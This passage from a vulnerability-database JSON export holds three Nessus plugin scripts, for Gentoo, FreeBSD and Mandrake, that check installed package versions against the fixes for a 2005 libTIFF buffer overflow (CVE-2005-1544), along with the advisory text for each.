"href": "https://www.tenable.com/plugins/nessus/18233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200505-07.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(18233);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-1544\");\n script_xref(name:\"GLSA\", value:\"200505-07\");\n\n script_name(english:\"GLSA-200505-07 : libTIFF: Buffer overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200505-07\n(libTIFF: Buffer overflow)\n\n Tavis Ormandy of the Gentoo Linux Security Audit Team discovered a\n stack based buffer overflow in the libTIFF library when reading a TIFF\n image with a malformed BitsPerSample tag.\n \nImpact :\n\n Successful exploitation would require the victim to open a specially\n crafted TIFF image, resulting in the execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200505-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All libTIFF users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/tiff-3.7.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/11\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/tiff\", unaffected:make_list(\"ge 3.7.2\"), vulnerable:make_list(\"lt 3.7.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libTIFF\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:45:00", "description": "A Gentoo Linux Security Advisory reports :\n\nTavis Ormandy of the Gentoo Linux Security Audit Team discovered a\nstack based buffer overflow in the libTIFF library when reading a TIFF\nimage with a malformed BitsPerSample tag.\n\nSuccessful exploitation would require the victim to open a specially\ncrafted TIFF image, resulting in the execution of arbitrary code.", "edition": 25, "published": "2005-08-01T00:00:00", "title": "FreeBSD : tiff -- buffer overflow vulnerability (68222076-010b-11da-bc08-0001020eed82)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "modified": "2005-08-01T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:pdflib", "p-cpe:/a:freebsd:freebsd:linux-tiff", "p-cpe:/a:freebsd:freebsd:ivtools", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:gdal", "p-cpe:/a:freebsd:freebsd:paraview", "p-cpe:/a:freebsd:freebsd:iv", "p-cpe:/a:freebsd:freebsd:ja-libimg", "p-cpe:/a:freebsd:freebsd:tiff", "p-cpe:/a:freebsd:freebsd:pdflib-perl", "p-cpe:/a:freebsd:freebsd:ja-iv", "p-cpe:/a:freebsd:freebsd:fractorama"], "id": "FREEBSD_PKG_68222076010B11DABC080001020EED82.NASL", "href": "https://www.tenable.com/plugins/nessus/19347", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19347);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-1544\");\n\n script_name(english:\"FreeBSD : tiff -- buffer overflow vulnerability (68222076-010b-11da-bc08-0001020eed82)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Gentoo Linux Security Advisory reports :\n\nTavis Ormandy of the Gentoo Linux Security Audit Team discovered a\nstack based buffer overflow in the libTIFF library when reading a TIFF\nimage with a malformed BitsPerSample tag.\n\nSuccessful exploitation would require the victim to open a specially\ncrafted TIFF image, resulting in the execution of arbitrary code.\"\n );\n # http://www.gentoo.org/security/en/glsa/glsa-200505-07.xml\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200505-07\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.remotesensing.org/libtiff/v3.7.3.html\"\n );\n # https://vuxml.freebsd.org/freebsd/68222076-010b-11da-bc08-0001020eed82.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?574534cb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:fractorama\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:gdal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:iv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ivtools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-iv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-libimg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:paraview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:pdflib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:pdflib-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:tiff\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"tiff<3.7.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-tiff<3.6.1_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"pdflib<6.0.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"pdflib-perl<6.0.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"gdal<1.2.1_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ivtools<1.2.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"paraview<2.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"fractorama<1.6.7_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"iv>0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-iv>0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-libimg>0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:32", "description": "Stack-based buffer overflow in libTIFF before 3.7.2 allows remote\nattackers to execute arbitrary code via a TIFF file with a malformed\nBitsPerSample tag. Although some of the previous updates appear to\nalready catch this issue, this update adds some additional checks.\n\nThe updated packages have been patched to correct this issue.", "edition": 24, "published": "2006-02-19T00:00:00", "title": "Mandrake Linux Security Advisory : libtiff (MDKSA-2006:042)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "modified": "2006-02-19T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libtiff3-static-devel", "p-cpe:/a:mandriva:linux:lib64tiff3-devel", "cpe:/o:mandrakesoft:mandrake_linux:10.1", "p-cpe:/a:mandriva:linux:libtiff3-devel", "p-cpe:/a:mandriva:linux:libtiff-progs", "cpe:/o:mandriva:linux:2006", "x-cpe:/o:mandrakesoft:mandrake_linux:le2005", "p-cpe:/a:mandriva:linux:lib64tiff3", "p-cpe:/a:mandriva:linux:libtiff3", "p-cpe:/a:mandriva:linux:lib64tiff3-static-devel"], "id": "MANDRAKE_MDKSA-2006-042.NASL", "href": "https://www.tenable.com/plugins/nessus/20941", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:042. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20941);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-1544\");\n script_xref(name:\"MDKSA\", value:\"2006:042\");\n\n script_name(english:\"Mandrake Linux Security Advisory : libtiff (MDKSA-2006:042)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stack-based buffer overflow in libTIFF before 3.7.2 allows remote\nattackers to execute arbitrary code via a TIFF file with a malformed\nBitsPerSample tag. Although some of the previous updates appear to\nalready catch this issue, this update adds some additional checks.\n\nThe updated packages have been patched to correct this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64tiff3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64tiff3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64tiff3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff-progs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libtiff3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/02/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64tiff3-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64tiff3-devel-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64tiff3-static-devel-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"libtiff-progs-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libtiff3-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libtiff3-devel-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libtiff3-static-devel-3.6.1-4.5.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64tiff3-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64tiff3-devel-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64tiff3-static-devel-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"libtiff-progs-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libtiff3-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libtiff3-devel-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libtiff3-static-devel-3.6.1-11.2.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64tiff3-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64tiff3-devel-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64tiff3-static-devel-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"libtiff-progs-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libtiff3-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libtiff3-devel-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libtiff3-static-devel-3.6.1-12.1.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}